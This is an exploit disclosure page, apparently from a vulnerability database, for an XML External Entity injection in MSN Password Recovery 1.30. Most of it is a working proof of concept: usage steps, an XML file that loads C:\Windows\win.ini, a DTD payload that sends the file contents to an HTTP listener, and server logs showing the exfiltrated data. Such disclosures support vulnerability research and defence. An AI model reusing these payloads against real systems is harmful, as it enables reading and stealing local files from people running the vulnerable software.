MSN Password Recovery 1.30 XML External Entity Injection

2020.01.09
Credit: ZwX
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2020-01-08 # Vendor Homepage : https://www.top-password.com/ # Software Link: https://www.top-password.com/download/MSNPRSetup.exe # Tested on OS: Windows 10 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software MSN Password Recovery 5) Click the 'Help' button and a 'Msn Password Recovery' window opens 6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml 7) Click the 'View' button 8) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top